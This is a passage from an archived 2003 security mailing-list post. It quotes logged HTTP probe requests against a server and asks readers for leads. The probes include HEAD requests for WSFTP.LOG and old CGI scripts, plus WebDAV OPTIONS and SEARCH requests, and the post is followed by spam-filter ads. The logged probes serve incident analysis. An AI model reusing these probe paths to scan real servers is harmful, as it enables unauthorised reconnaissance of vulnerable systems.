HTTP/1.0\x0a\x0a HEAD /WSFTP.LOG HTTP/1.0\x0a\x0a HEAD /cgi-bin/wwwboard.pl
HTTP/1.0\x0a\x0a HEAD /cgi-bin/www-sql HTTP/1.0\x0a\x0a OPTIONS /

Can we help you?X

HTTP/1.1\x0d\x0atranslate: f\x0d\x0aUser-Agent: Microsoft-
WebDAV-MiniRedir/5.1.2600\x0d\x0aHost: 159.37.8.1\x0d\x0aContent-Length: 0 \x0d\x0aConnection: Keep-Alive\x0d\x0a\x0d\x0a SEARCH / HTTP/1.0\x0d\x0a\x0d\x0a Thanks for any leads, Dean

Powerful Anti-Spam Management and More... SurfControl E-mail Filter puts the brakes on spam, viruses and malicious code. Safeguard your business critical communications. Download a free 30-day trial: http://www.securityfocus.com/SurfControl-incidents

<b>


Is SPAM over-loading your e-mail server, disk space or bandwidth? SurfControl E-Mail Filter is flexible, intelligent and policy-driven protection.
http://www.securityfocus.com/SurfControl-incidents2 Download your free fully functional
trial, complete with 30-days of free technical support. Stop SPAM before it stops you.

</b> Received on Mon Apr 7 18:40:44 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:02 EDT

Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library